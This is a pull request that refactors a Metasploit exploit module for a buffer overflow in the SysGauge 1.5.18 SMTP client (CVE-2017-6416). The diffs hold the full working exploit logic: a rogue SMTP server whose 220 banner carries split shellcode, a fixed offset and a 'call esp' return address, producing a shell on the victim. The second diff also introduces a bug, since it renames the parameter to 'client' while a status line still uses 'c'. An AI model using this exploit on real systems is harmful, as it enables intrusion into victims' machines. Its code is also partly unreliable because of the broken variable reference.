### PR TITLE
sysgauge_client_bof: Updated initialize()

### DIFF
--- a/modules/exploits/windows/smtp/sysgauge_client_bof.rb
+++ b/modules/exploits/windows/smtp/sysgauge_client_bof.rb
@@ -8,44 +8,48 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = NormalRanking
 
-  def initialize()
+  def initialize(info = {})
     super(
-      'Name' => 'SysGauge SMTP Validation Buffer Overflow',
-      'Description' => %q{
-        This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
-        via its SMTP server validation. The module sends a malicious response along in the
-        220 service ready response and exploits the client, resulting in an unprivileged shell.
-      },
-      'Author' => [
-        'Chris Higgins', # msf Module -- @ch1gg1ns
-        'Peter Baris'    # Initial discovery and PoC
-      ],
-      'License' => MSF_LICENSE,
-      'References' => [
-        [ 'CVE', '2017-6416' ],
-        [ 'EDB', '41479' ],
-      ],
-      'DefaultOptions' => {
-        'EXITFUNC' => 'thread'
-      },
-      'Payload' => {
-        'Space' => 306,
-        'BadChars' => "\x00\x0a\x0d\x20"
-      },
-      'Platform' => 'win',
-      'Targets' => [
-        [
-          'Windows Universal',
-          {
-            'Offset' => 176,
-            'Ret' => 0x6527635E # call esp # QtGui4.dll
-          }
-        ]
-      ],
-      'Privileged' => false,
-      'DisclosureDate' => 'Feb 28 2017',
-      'DefaultTarget' => 0
+      update_info(
+        info,
+        'Name' => 'SysGauge SMTP Validation Buffer Overflow',
+        'Description' => %q{
+          This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
+          via its SMTP server validation. The module sends a malicious response along in the
+          220 service ready response and exploits the client, resulting in an unprivileged shell.
+        },
+        'Author' => [
+          'Chris Higgins', # msf Module -- @ch1gg1ns
+          'Peter Baris'    # Initial discovery and PoC
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2017-6416' ],
+          [ 'EDB', '41479' ],
+        ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread'
+        },
+        'Payload' => {
+          'Space' => 306,
+          'BadChars' => "\x00\x0a\x0d\x20"
+        },
+        'Platform' => 'win',
+        'Targets' => [
+          [
+            'Windows Universal',
+            {
+              'Offset' => 176,
+              'Ret' => 0x6527635E # call esp # QtGui4.dll
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => 'Feb 28 2017',
+        'DefaultTarget' => 0
       )
+    )
+
     register_options(
       [
         OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),

--- a/modules/exploits/windows/smtp/sysgauge_client_bof.rb
+++ b/modules/exploits/windows/smtp/sysgauge_client_bof.rb
@@ -12,15 +12,15 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'SysGauge SMTP Validation Buffer Overflow',
+        'Name' => 'SysGauge 1.5.18 SMTP Validation Buffer Overflow',
         'Description' => %q{
           This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
           via its SMTP server validation. The module sends a malicious response along in the
           220 service ready response and exploits the client, resulting in an unprivileged shell.
         },
         'Author' => [
-          'Chris Higgins', # msf Module -- @ch1gg1ns
-          'Peter Baris'    # Initial discovery and PoC
+          'Peter Baris',   # Initial discovery and PoC
+          'Chris Higgins'  # msf Module -- @ch1gg1ns
         ],
         'License' => MSF_LICENSE,
         'References' => [
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => 'win',
         'Targets' => [
           [
-            'Windows Universal',
+            'SysGauge 1.5.18',
             {
               'Offset' => 176,
               'Ret' => 0x6527635E # call esp # QtGui4.dll
@@ -45,26 +45,26 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'Privileged' => false,
-        'DisclosureDate' => 'Feb 28 2017',
+        'DisclosureDate' => '2017-02-28',
         'DefaultTarget' => 0
       )
     )
 
     register_options(
       [
-        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
+        OptPort.new('SRVPORT', [ true, 'The local port to listen on', 25 ]),
       ]
     )
   end
 
-  def on_client_connect(c)
+  def on_client_connect(client)
     # Note here that the payload must be split into two parts.
     # The payload gets jumbled in the stack so we need to split
     # and align to get it to execute correctly.
-    sploit = "220 "
+    sploit = '220 '
     sploit << rand_text(target['Offset'])
     # Can only use the last part starting from 232 bytes in
-    sploit << payload.encoded[232..-1]
+    sploit << payload.encoded[232..]
     sploit << rand_text(2)
     sploit << [target.ret].pack('V')
     sploit << rand_text(12)
@@ -73,9 +73,9 @@ class MetasploitModule < Msf::Exploit::Remote
     sploit << payload.encoded[0..231]
     sploit << "ESMTP Sendmail \r\n"
 
-    print_status("Client connected: " + c.peerhost)
-    print_status("Sending payload...")
+    print_status("Client connected: #{c.peerhost}")
+    print_status('Sending payload...')
 
-    c.put(sploit)
+    client.put(sploit)
   end
 end


### PR DESCRIPTION
Very minor, when I was doing some grep'ing, noticed it was one of only a few modules that didn't use update_info. 

`def initialize()` -> `def initialize(info = {})super(update_info(...))`